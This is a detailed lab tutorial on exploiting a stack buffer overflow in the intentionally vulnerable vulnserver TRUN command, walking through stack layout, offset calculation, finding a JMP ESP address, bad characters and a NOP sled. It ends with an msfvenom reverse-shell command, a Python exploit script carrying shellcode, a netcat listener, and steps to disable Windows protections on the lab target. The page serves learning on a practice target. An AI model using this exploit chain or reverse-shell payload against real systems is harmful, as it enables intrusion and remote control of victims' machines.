Buffer Overflow - Explained

An in-depth guide on a basic buffer overflow and the details behind developing an exploit for it.

PreviousInfographics NextEmbedded Firmware Extraction

Last updated 10 months ago

Was this helpful?

Buffer Overflow - Explained

An in-depth guide on a basic buffer overflow and the details behind developing an exploit for it.

Motivation

Buffer overflows have been covered by a lot of people in hundreds of writeups, videos and blogs. However, while teaching this subject to myself I often found phrases or explanations that left out important details, were immensely vague or even turned out to be straight up false.

Since I like to get into the details of how things work and why they work, I decided to share the entire manual process of dissecting one very common and basic buffer overflow.

For this I will use the vulnserver, specifically the TRUN command - starting from confirming the vulnerable entry point all the way up to spawning a reverse shell without taking any guesses.

It is entirely up to you to use this resource supplementary or as a stand alone read.

If this is your first time ever reading about buffer overflows - or you just want a quick hands-on intro - maybe check out my Final Notes first. There you'll find some good YouTube tutorials with the typical and far more practical approach. Here we're all about the details.

The Vulnserver

Introducing one of the most common applications used for practicing buffer overflows:

As stated in the description, this is an intentionally vulnerable application with the sole purpose of learning different sorts of buffer overflows. Here, we are going to concentrate on the most basic scenario that's built in to the TRUN command (one of the many commands the vulnserver offers upon connecting to it).

Setup

Depending on whether you want to follow along you'll need some tools:

VMware or VirtualBox for creating a virtual lab environment
- Make sure to put both VMs in the same network - preferably NAT Network in VBox and NAT in VMware
A virtual machine for the attacker - I'll use Kali Linux
A windows virtual machine for the target (I'll use Windows 11)
- Once setup make sure to disable Real-time protection
- Download vulnserver from https://github.com/stephenbradshaw/vulnserver
  - You need at least the essfunc.dll and vulnserver.exe in the same directory
- Process Explorer (Windows Sysinternals)
- A hexeditor like Hexinator

32-bit Stack Basics

Before we start looking at any code or exploit I want to give a brief introduction to the 32-bit stack.

This is not meant to be a comp-sci class. I'll assume some basic computer knowledge.

First of all, what and where is the stack?

The stack is a memory region located on the physical RAM in your computer. Simply speaking it's a "last-in-first-out" (LIFO) structure, responsible for storing any local variables that a function might need to remember or work with.

In the image below you can see the location of the stack in a broad depiction of the entire memory.

Notice that the highest address is at the top (32 bits of '1' or 4 bytes 0xff) and the lowest address is at the bottom. We can also see that there is a free memory region below the stack that can be used to allocate more space when needed (for example when calling a new function). Keep in mind that the stack grows towards lower addresses -> meaning the stack grows down.

Always pay attention to the direction a stack is depicted by looking at the addresses. Some tools and resources reverse the layout and put the highest address at the bottom. Suddenly the stack "grows upwards" visually.

To avoid any confusion, following is an example of the stack and its memory addresses plus the terms I will use to reference the stack in the future. The "bottom of the stack" faces towards the highest address and the "top of the stack" (i.e. the last item that was pushed on it) is located towards the lowest address.

Yes, it's visually counter intuitive to name the lower address the top of the stack but logically it makes sense as we push to and pop from the top.

So how does the stack work and why is it important for us?

In addition to normal local variables a program will also save some meta values on the stack. These values help the program to keep track of things like "where do I return to when the current function ends" and "where are my arguments". And they are stored on the stack in a standardized way.

To be more explicit, I am talking about the contents of the (extended) base pointer (EBP) and the (extended) instruction pointer (EIP) registers that are both pushed on the stack whenever a function is called.

The final register that'll be important for us is the (extended) stack pointer (ESP). Its content is always the lowest available stack address (i.e. it points to the top of the stack).

If you don't feel familiar with the terms ESP, EIP and EBP I would advise you to do some basic research on those before continuing.

Let's break down the basic order in which the stack is being filled when a function is called:

The caller pushes any arguments it wants to pass to the callee on the stack
The content of the instruction pointer register (i.e. the address of the next instruction after the function call) is pushed on the stack
The content of the base pointer register is pushed by the callee
The stack pointer is decreased by the amount of requested memory space for local variables (12 bytes in the example below) (remember decreasing the ESP means increasing the stack)

Below you can see an exemplary stack with fictional contents during a function call.

Let's try to examine that scenario.

The EIP points to the next instruction to be executed (0x77864A5C - the next instruction inside our current function).

The EBP points to the base of the current stack frame - basically it's an anchor to reference local variables easily - here we have 0x0060DF1C. At this memory address we also find the address of the previous frame pointer which we can later load back into to EBP register to restore the previous function scope.

At EBP + 0x4 (4 bytes above the EBP) we find the instruction pointer that was saved when this function was called. When the current function ends this value will be loaded (pop'ed) back into the EIP and program execution will continue at this address.

At EBP + 0x8 we can find a parameter that was passed to the current function: 0xDEADBEEF in little endian format.

If you have difficulties following along so far I can suggest this resource which describes the steps from above (and more) in way greater detail: https://textbook.cs161.org/memory-safety/x86.html.

Below the EBP we see 12 bytes that were allocated and the ESP pointing to the top of that space. In this example this buffer was filled with the string "ABCDEFGHIJKL" (we're viewing the hexadecimal representation of the ASCII values).

Note that, since the stack works with the little endian format, an ASCII string like "ABCD" which in hexadecimal is 0x41 0x42 0x43 0x44 on the stack will be interpreted as the 32-bit value 0x44434241 when used as a pointer for example.

As you can see, the buffer starts at the lowest address and is being filled up continuously.

So what happens when we start writing more than 12 bytes into that buffer? We overflow it.

After overflowing the 4 bytes of the frame pointer that lies directly over the buffer we can also overwrite the return address. That would allow us to redirect the execution flow to anywhere we want as soon as the current function ends.

To conclude this introduction, here is a visual representation of what the basic idea of a buffer overflow looks like.

With the theory at hand now let's dive into the practical part and examine the vulnserver.

Locating the BOF

Let's look at the vulnserver. We know that for a buffer overflow to occur all we need is an unsafe way of writing an arbitrary amount of bytes to a buffer that's located on the stack.

Usually, finding such a potential vulnerability can be done by spiking the target application - but we'll try to identify the vulnerability manually (in the code) instead.

Spiking is the process of testing an application with many different sorts of inputs in order to find a pattern that can cause a crash.

Using the manual approach obviously takes a lot longer because we have to look at the (decompiled) source code. But sooner or later we come across this Function3.

Regardless of whether we had decompiled the .exe or gained access to the source code - we can see that in Function3 an array of unchecked length is copied into a buffer of a fixed length (2000 bytes as per the source code) using strcpy. Hence, if the input was larger than the target buffer (Buffer2S) we'd overflow it.

In case you wondered about the destination size (2008 vs. 2000 bytes), we'll see Ghidras reason to display the 2008 in a second when we look at the disassembly.

The manpage even warns about the unsafe use of strcpy - and there doesn't seem to be any safety check in place. At least not in this function. So let's find out how we can trigger this function and whether we can control the input arbitrarily.

Triggering the BOF

Looking at the function references we can quickly identify the only place where Function3 is being called from. Once again, we can get this information from either the decompiled or source code.

With a tiny bit of reverse engineering we can outline the following steps:

The RecvBuf contains all the bytes that were sent to the server and will be named "input" from here on.

First the input must start with the five characters "TRUN "
Then a buffer with 3000 elements is allocated and filled with zero (TrunBuf)
If the input contains a '.' character anywhere starting from the 6th character
- then the first up to 3000 bytes from the input are copied to TrunBuf
- and Function3 is called with TrunBuf as argument

The rest of the code clears TrunBuf and sends a hardcoded answer to the client but that's not important for us because we already got everything we need. Apparently we can cause the program to copy up to 3000 bytes of our input (that must start with at least "TRUN .") into a buffer that's only ~2000 bytes large when TrunBuf is passed to Function3.

We now combined the first couple of pieces to find a way of overflowing Buffer2S.

To compare with usual tutorials, first you would have spiked the application to find that a large input containing a "." can crash the TRUN command and subsequently you would have fuzzed* the target to reveal that a length somewhere between 2000 and 3000 suffices. (*Fuzzing - sending inputs of increasing length until one causes a crash)

Calculating the Offset

So far we know that a simple string like this: 'TRUN .' + 'X'*2994 (python syntax) would crash the target. (Remember that at most 3000 bytes are taken from our input so we don't have to bother sending any more than that.)

Actually, we can be fairly certain that a 2100 byte long input would also be enough. Since there were no other visible local variables in the vulnerable function, the EBP and RIP are likely to be very close to the buffer.

However, in order to write an exploit that overwrites the RIP with a precise value we are going to need the exact offset of the RIP to the buffer we are overflowing.

This step is typically called "finding the offset" and describes the use of a unique pattern that is sent to the target. The attacker then uses a debugger to find the value in the EIP at the time of the crash and searches that sequence in the original pattern, thus finding the offset of the bytes that overwrite the RIP.

Although the debugger would be the faster choice and definitely easier to use when the code is more complex, let's see what happens under the hood of Function3. For this purpose we'll have a look at the disassembled code.

If you have never read assembly before this might look intimidating at first but we'll walk through it.

The very first line shows the label of this function (_Function3) and the argument that is passed: arg_8h. As we've seen in the source code already this is an address pointing to our input.

The following three lines list some references and their relative addresses (kind of like variables but not quite like that!).

The char* reference dest points at "base pointer - 0x7d8"
(Remember the 2008 from Ghidra? Since there is literally no other size indication or boundary to this array, Ghidra assumed the size of that array to be 0x7d8 or decimal: 2008.)
The char* argument arg_8h references "base pointer + 0x8" (Remember the graphic from the stack introduction? - "base pointer + 4" is the RIP and "base pointer + 8" is an argument to the current function)
The char* reference src points at "stack pointer + 0x4". Derived from the call to strcpy and conveniently for us, the names src and dest already hint to what these addresses are going to be used for.

All the pointers might be hard to visualize in mind the first time, so we will draw the stack out in a second. But before we do that let's cover the first three instructions of this function - the "prologue" which basically initiates this function on the stack.

push ebp: Store the current contents of the base pointer register on the stack - just like we discussed in the stack intro. The push instruction will automatically decrease the stack pointer so that it shows at the top of the stack (to the last element that was pushed).
mov ebp, esp : Move the contents of the stack pointer to the base pointer register. Now both the EBP and the ESP point to the last item on the stack (which is the previous EBP value).
sub esp, 0x7e8 : Subtract 0x7e8 (decimal: 2024) from the stack pointer, thus increasing the stack.

So currently the stack looks like this:

With the next four instructions we get the following layouts:

Basically, the pointer to our input buffer (the 3000 byte array) is now stored at 0x0060D72C.

And now we stored the address 0x060DF38 (that was previously labelled dest) at 0x0060D728.

Remember the references from the first three lines? The address that's now on the top of the stack (visual bottom) was referenced with dest and the value below the top was named src. That's because the next instruction is a call to the function sym._strcpy and we know that before we call a function we must push its arguments to the stack.

As a side note, x86 calling conventions state that the arguments to a function shall be pushed on the stack in reversed order. So the last argument to a function must be pushed first (lands at the higher address).

So when calling strcpy(destination, source) - indeed the value at the top of stack becomes the destination address and the value below that becomes the source address.

Leading us to the conclusion that we will copy up to 3000 bytes from our input to the address 0x0060DF38 in the example above. As a reminder, this means that starting from the address 0x0060DF38 we write characters to increasing addresses. After offset bytes we will start to write at the position of the saved instruction pointer. Finally, the offset to the RIP can be calculated easily:

"Address of the RIP" - "Start address of the overflowing buffer" = Offset

In our case that's 0x0060DF14 - 0x0060D738 = 2012 bytes.

It doesn't matter what addresses we choose in our example because we only care about the distance between the two addresses.

So now we succesfully calculated the exact amount of bytes that we need to put on the stack before we start overwriting the RIP: 2012.

(Of course we could've just taken the offset of the destination buffer immediately: ebp-0x7d8 and then add 0x4 to account for the ebp and we'd get the same result - but knowing the details of why that works was worth the long way in my opinion.)

Finding a Path to Exploitation

So far we know exactly how to overwrite the return instruction pointer and have the option to put in any address that we like. But how do we choose which address to use?

The goal now is to find a suitable return address - and that's most often done using mona.py and Immunity Debugger. However, let's try to break down the steps that are made for us here.

Before investigating the overflow further we should check for any security measures. In principle, since the buffer overflow is a rather old vulnerability, executables can be protected in a lot of ways that each prevent or at least impede different exploitation techniques.

The most prominent protection mechanisms that are going to be important for us are Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). Feel free to dig deeper into other mechanism as well but here I'll just focus on briefly covering these two.

Address Space Layout Randomization - ASLR

Without any protection enabled, a program that's being loaded into memory would always land at the exact same virtual address. By being this predictable an adversay could easily calculate addresses of any instruction in that binary and use these in an overflow attack.

ASLR forces the memory addresses to be randomized - so the program will land at a different address each time it is loaded. Consequently, the attacker can not predict an address and will have a harder time finding a suitable one.

Data Execution Prevention - DEP

DEP, also called NX (which stands for No eXecute), is a protection that prevents the CPU from executing any commands that reside in certain memory areas (such as the stack). If we were to attempt execution of commands placed inside our buffer on the stack while DEP is active - then our program would terminate with a memory access violation exception.

Both measures have been around for quite some time and should be enabled whenever developing an application, especially when using a language like C.

Note that even when used together they could still be bypassed using some sort of address leak and return oriented programming - but that's out of scope here.

Coming back to thevulnserver, we can check an executable for enabled ASLR and DEP by inspecting the PE headers. Below you'll find the output of a tool called winchecksec that extracts the relevant values and prints them.

We notice that neither ASLR nor DEP (NX in this output) are enabled. Meaning that we:

know where vulnserver.exe will be in memory and
are able to execute arbitrary code that we can put on the stack.

With that information we are ready to come up with a first plan for our exploit.

Either we put our exploit code - remember our goal is to spawn a reverse shell, so from here on I'll refer to that code as shellcode - at the very beginning of our buffer or after the RIP. (We will ignore other techniques such as ROP for brevity here.)

However, in both scenarios the RIP should point to the start of the code - which is an address somewhere on the stack. While we know the address of any instruction in our executable, unfortunately we don't know the exact address of our overflown buffer on the stack.

Although ASLR is disabled for the vulnersver.exe, each connection handler is spawned in a new thread via the Kernel32.dll, which does have ASLR enabled as we'll see in a bit, thus also randomizing the stack address for the new thread.

Additionally, relying on a hardcoded stack address wouldn't be a very portable solution for an exploit anyway because the stack can depend on things like the OS version and environment.

So instead we'll be using another way to jump into the stack. To understand that technique, let's reiterate one more time over the exact contents of the stack and registers during runtime (feel free to skip ahead if you already know where I'm going with this, but for those new to the topic I hope that repeating the visualization of the stack might be useful).

So far this graphic shouldn't be surprising. After the call to strcpy was made, we've overflown the buffer and overwritten the previous EBP and RIP values stored on the stack. What's important is the next instruction (EIP points to it) and the one after that. Let's see what these do:

The leave instruction is responsible for cleaning up the allocated stack space of a function. It will revert the changes made to the ESP and point it to the current address stored in EBP, indicating that everything below that is now free stack space (it does not modify any values on the stack). In a second step the leave executes pop EBP which will load the value from the current top of the stack (expected to be the previous base pointer) into the EBP register and increment the ESP accordingly. Thus, after the leave and before the ret the ESP points to what should be the return instruction pointer.

The ret instruction will then cause a pop EIP causing the current value on the top of the stack to be loaded into the EIP register. Consequently, the next address at which execution would continue is 0x12121212 in this example. The pop also increases the ESP so that it continues to point at the top of the stack (right to what has previously been the function argument).

This may have been very verbose, but we've now learned that there is a register that contains an address pointing directly to our buffer (after the RIP value to be precise).

The reason we've looked at this particular step in detail is that some tutorials and guides talk about "overflowing the ESP", "writing to the ESP" or "the ESP containing shellcode" which is very misleading. The ESP is a register and it contains a 4 byte address!

Coming back to our task at hand, we may not know a stack address ourselves but we do know a register that contains the address required for exploit Variant B to work.

Combining this with our possibility to predict addresses of instructions in the vulnserver source code we can now make a new exploit plan that attempts to redirect execution to a JMP ESP instruction somewhere in our code. The JMP ESP will then casue the CPU to jump to the address stored in ESP which we know points to our shellcode.

It seems that all that's left to do is to find the address of a JMP ESP instruction somewhere in the vulnserver source code.

We previously found out that we can predict any address of instructions in code segments due to disabled ASLR. But how exactly?

Let's dig a bit more into that statement. The default address for an executable in memory is 0x00400000 and over here you'll find a great resource on the why for that. But more interestingly, you can confirm that yourself by looking at the base address during runtime.

If you remember the memory layout from the introduction now you may notice the abstraction that I made. If it were to be made precise then the text segment should indeed start at 0x00400000 instead of 0x00000000.

For the purpose of viewing the active vulnserver, its libraries and their addresses we can use a windows sysinternal called Process Explorer. Below you can see a screenshot of that:

In the bottom pane, that lists loaded libraries and details about the vulnserver process, we can see a column called ASLR. You'll notice that ASLR is not only disabled for the .exe itself but also for a .dll (dynamically linked library) called essfunc.dll (it was part of the vulnserver download).

Most importantly though, we can see the Image Base addresses for these code regions. The vulnserver.exe does indeed reside at 0x00400000. Note that we can also write down the base address for the essfunc.dll (0x62500000) as it does equally serve as a pool of possible instructions for us to jump to with ASLR disabled.

Knowing the base addresses of these code segments and knowing that they won't ever be randomized or changed we can search for instructions in these code segments and get their virtual address by adding their file offset to that base address.

To find a JMP ESP instruction in the vulnserver.exe we can't just simply search for a string because it's a binary file. It consists of the binary assembler commands for the CPU (amongst headers and other regions). Instead, one possible way of finding an instruction is to search for the corresponding opcode - the hexadecimal value of said instruction.

Using an (online) assembler or google we can quickly determine that the opcode for a JMP ESP instruction consists of the two bytes 0xFF 0xE4. We can now use a simple hexeditor like hexinator to open the vulnserver.exe and search for the byte sequence FFE4.

I'll save you a few seconds by telling you that you won't find any such sequence in the vulnserver.exe though. It just doesn't occur.

However, remember that we also have the essfunc.dll at our disposal. Opening it in our favorite hexeditor and searching for FFE4 we get lucky.

Great, we found nine possible JMP ESP instructions (marked yellow)! Feel free to choose any one of them - I'll continue with the first one. And just as a reminder, yes, there are tools that can do all that and more for you.

Now to find the offset of that instruction one could be tempted to use the 0x5af that's displayed in the bottom left corner of the screenshot. And indeed, that's the offset of the instruction in this entire .dll file but, as mentioned before, the .exe and .dll consist of more than just code.

I went ahead and also marked the actual beginning of the code section inside the .dll with blue. So the code starts at 0x400 meaning that a file offset of 0x5af turns into a code offset of 0x1af.

This might seem like pulling a random hex number out of a hat at first, but referencing the PE headers one more time and examining the actual headers of the vulnserver.dll with dumpbin we can see that every byte is accounted for:

Firstly, we can see the image base address that we already saw in the Process Explorer. This is the address at which the dll will be loaded to. Secondly, we see the base of code being at an offset of 0x1000 - so the code section of the dll will start at 0x62501000 in memory. Finally, we also see the 0x400 (size of headers) that describe the offset of actual code in the dll.

Knowing these numbers we can continue to calculate the address at which the JMP ESP instruction is going to be in memory.

0x62500000 (base address) + 0x1000 (base of code) + 0x1AF (instruction offset in .dll) = 0x625011AF.

Finally, we successfully calculated a suitable return address to a JMP ESP instruction.

0x625011AF

Just to reiterate, with that information our plan for exploitation now looks like this:

TRUN .<padding to the length of 2012><0x625011AF><shellcode>

Determining Bad Characters

Before we can start looking at the shellcode we have to check for what's generally called "bad characters". In essence, bad characters are bytes that may malform our final payload on the target.

Comparing to the normal tutorial again, this step usually requires a trial and error sequence of sending all bytes (ranging from 0x00 to 0xFF) with a script and then observing the memory on the target to spot any differences.

Once we can look into the code though, we can deduce the bad characters manually. For this we simply follow the input buffer that contains the bytes we sent.

Result = recv(Client, RecvBuf, RecvBufLen, 0);

First the vulnserver receives at most 4096 (RecvBufLen) raw bytes from the Client socket and stores them in RecvBuf (a byte array). This includes all bytes ranging from 0x00 to 0xFF.

Focusing on the TRUN command, the next line that will deal with the RecvBuf is one we've already looked at during the chapter "Triggering the BOF":

strncpy(TrunBuf, RecvBuf, 3000);

Up to 3000 bytes from RecvBuf are copied into TrunBuf. From the manpage for strncpywe get that this function

copies the string pointed to by src, including the terminating null byte ('\0'), to the buffer pointed to by dest.

So every byte after the first 0x00 will be discarded by this function. Thus, we can't have a 0x00 inside our payload before the shellcode ends!

The next step is the call to Function3 and the unsafe use of strcpy which has the same null byte behavior. Other than that there are no manipulations on the input buffer for the TRUN command.

We can therefore conclude that the only bad character for our buffer overflow is the null byte.

Other commands on the vulnserver (such as LTER) are a bit more restrictive and will manipulate the incoming bytes. You can view an example here. Feel free to cross check with the source code to see how the other bad characters come to exist.

It's important to note that the bad characters must also be taken into account when choosing a return address. If our return address would include a 0x00 for example, we couldn't use it without ending our payload at that position. Luckily for us, 0x625011AF is without a null byte or we'd have to find a different address.

Generating Shellcode

Moving on to the next step of our exploit creation. We got an offset, we got a JMP ESP instruction and we determined the bad characters. What's left to do is to create the shellcode and integrate it to our payload.

This is not a course on shellcode nor would I have the expertise to write on any of that in detail. So we'll only have a short look on how to create some before disassembling the first few instructions in the next chapter.

There's many ways to go on about this part. We could google for common shellcode [1][2][...] (at your own risk), actually learn exploit development and write our own [1], or use a tool that does everything for us (how does that sound, huh?).

This is the moment where we'll blatantly copy what most tutorials demonstrate:

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=80 EXITFUNC=thread -b "\x00" -f py

Using msfvenom from the metsploit framework we are generating a non staged tcp reverse shell payload that will connect back to 10.0.2.15 (my Kali machine) on port 80. With EXITFUNC=thread we specify that our shellcode runs in a sub-thread and should not crash the application when this sub-thread ends. Lastly, we specify our one bad character to be omitted during generation with -b and set the output format to python with -f py.

Once we've got the shellcode as a sequence of bytes (raw instructions that will spawn our reverse shell on the target system) we can copy it for our final exploit payload.

Building a NOP Sled

As we're slowly approaching the final phase, there is one more thing to add to our payload that's often being mistreated in my opinion. The NOP sled. Simply speaking, the NOP or no-op instruction is an instruction that has no effect on anything other than the EIP register. The CPU executes it without doing anything and continues at the next address.

A NOP sled is a concatenation of lots of NOP instructions. Once the CPU hits one it will continue to increase the EIP until a normal instruction occurs. Note that sometimes a NOP sled can also refer to a bunch of instructions that just keep the status quo - such as incrementing and then decrementing a register for example.

What's sometimes taught for the vulnserver and the TRUN command is that "we must include a NOP sled because we don't know where the shellcode will be in memory" or something similar. - But as we found out previously, that's not the case. We know exactly where it'll be.

If you remember the chapter where we talked about different exploit variants, we drew return addresses that pointed directly into the stack. As I already stated back there, even when ASLR is disabled the stack address might not be entirely deterministic as it could slightly change from system to system or even from "with debugger attached" to "without debugger attached".

In order to defeat this uncertainty, one could then add a NOP sled on the stack before the shellcode and try to aim somewhere in the middle of that with the return address. Thus, as long as the EIP hit the NOP sled somewhere it would start to slide along the NOPs until executing the shellcode.

If you'd like to see an example for that technique you can check out my write up on the Binex room from TryHackMe here.

Anyway, since we're using the address of the JMP ESP we will land exactly at the first instruction of our shellcode. So there is no randomness involved. However, if we were to attempt exploitation without a NOP sled we'd still fail.

In order to understand why that is and how big of a NOP sled we need, we'll have to look at the first few instructions of the shellcode. Using an (online) disassembler we can investigate the first couple of bytes that msfvenom generated for us:

Although yours might look slightly different, when msfvenom used the shikata_ga_nai encoder (default) the first few instructions will consist of something like:

<some floating point operation>
FNSTENV [ESP-0xC]

For a detailed explanation for these instructions you can consult this great article. Here I'll try to focus only on what's important for us.

Since shellcode can land anywhere in memory it can not rely on any hardcoded addresses. Therefore, the first thing that this shellcode attempts to do is to get a reference to where it is located via the EIP. The technique of using FNSTENV for that purpose is described here and here.

The FNSTENV instruction basically loads the 28 bytes large floating point environment structure to the specified address. By loading the structure to the offset ESP - 0xc (dec: -12) it aligns on the stack in such a way that the value holding the current EIP content is placed at the address the ESP currently points to. This way, the next pop instruction will load the current EIP value to the specified register (ebx in our example).

Because our FNSTENV instruction is placed 7 bytes (see the offset in the disassembly) after where the ESP points to during runtime of our exploit - when the instruction causes to overwrite 12 bytes below the ESP and then 16 more bytes starting from the ESP it simply overwrites a part of the shellcode that wasn't even executed yet. To be precise, 7 bytes of already executed shellcode + 4 bytes of the FNSTENV instruction itself and then (16-7-4=) 5 bytes of shellcode that weren't executed yet.

And finally, this is the real reason for the necessary NOP sled. We must avoid the shellcode overwriting itself which we can achieve by prepending it with (at least) 5 NOP bytes.

On a final note, you'll likely never make the effort of calculating the exact amount of necessary NOP bytes ever again if you can just use a generic 32-byte NOP sled. However, this chapter was to demonstrate that there is absolutely nothing mysterious or random about this buffer overflow. So next time someone tells you that you have to use a NOP sled "because you have to" - you now know a bit more.

Exploiting the Target

Finally, we've made it all the way to the actual exploit writing. Up until now we didn't have to write a single line of code to understand how to exploit this particular buffer overflow.

For this part I'm going to use python3 but you can attempt to use any language that you feel comfortable with. Some people even use PowerShell... (While I don't agree with some of the technical representations, the PowerShell solution is amazing.)

Basically, we just have to combine the different pieces that we collected throughout the chapters:

The buffer must start with TRUN .
After 2012 bytes we start overwriting the RIP value, so we can create the necessary padding with: b"TRUN ." (6 bytes) + b"A"*(2012-6)
For the return address we chose 0x625011AF
Following the return address comes the NOP sled: b"\x90"*5
At the end comes the shellcode that we generated with msfvenom

When using python3 the socket.send() method requires a byte string. Thus, all strings will be prepended with a b. Alternatively, we could use "string".encode('latin1') for every string.

There is one final thing to note. We know that we must place the address 0x625011AF on the stack. But as previously explained the values on the stack are stored in little endian format. So if we want to create the value 0x625011AF we actually have to write the single bytes in reversed order to the stack. Therefore, to create that address on the the stack we must write the bytes 0xAF 0x11 0x50 0x62.

Stitching all of what we've gathered together in a single script, we get the following.

#!/usr/bin/env python3

# import socket library for connection to the server
import socket

# Shellcode created with msfvenom
buf  = b"\xb8\xdf\xf1\x63\x55\xda\xde\xd9\x74\x24\xf4\x5b\x31"
# CLIPPED FOR BREVITY
buf += b"\xaf\x67\x70\x1c\x77\x94\x08\x0d\x12\x9a\xbf\x2e\x37"
shellcode = buf

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Use the socket to connect to the target vulnserver
s.connect(('10.0.2.9',9999))

# Use the starting bytes "TRUN ." to trigger the call to Function3
trigger_command = b'TRUN .'

# Create a padding that will fill the assigned buffer and overwrite the EBP
padding = b'A'*(2012 - len(trigger_command)) 

# Little endian representation of the address to the JMP ESP instruction
# This will overwrite the return instruction pointer (which will be loaded
# into the EIP register)
overwrite_rip = b'\xAF\x11\x50\x62'

# A NOP sled to avoid the shellcode overwriting itself
nop_sled = b'\x90'*5

# Combine all the pieces to form the payload
payload = trigger_command + padding + overwrite_rip + nop_sled + shellcode

# Send the payload to the vulnserver
s.send(payload)

And that's it, we're done. Let's test that exploit.

A small reminder if you've been following along with a Windows 11 target. In order for this exploit to work, you must disable the Mandatory ASLR option under "App & browser control" > "Exploit protection settings" - restart the virtual machine and then also disable Real-time protection under "Virus & threat protection settings".

Open a simple netcat listener with nc -nlvp 80, make the script executable with chmod +x exploit.py and finally run it.

We successfully triggered the reverse shell.

Final Notes

We've tried to trace the entire process all the way from locating the vulnerable entry point up to successfully spawning a reverse shell - writing and firing only a single exploit script.

It's pretty much obvious that this method quickly becomes very tedious and far more difficult once the target application gets more complex. Using the tools and methodologies shown in the more practical tutorials is definitely recommended and sufficient for most challenges you'll encounter in CTFs for example.

However, I hope that you were able to gain at least something out of whatever this here ended up being and do now have a deeper understanding of the basic buffer overflow. Or maybe you were just equally as curious and can now sleep a tiny bit better.

Either way, I'm gladly taking feedback on any of the above. You can find me over at TCMs discord and drop me a message anytime (I trust that you can find me) - or if you'd rather be subtle feel free to smash one of those smiley faces.

Practical Buffer Overflow Introductions

If you want to follow a more practical and user friendly introduction - you can try one of these:

Acknowledgements

Huge thanks to my proof-readers and @TCM Security for the great support.

PreviousInfographics NextEmbedded Firmware Extraction

Last updated 10 months ago

Was this helpful?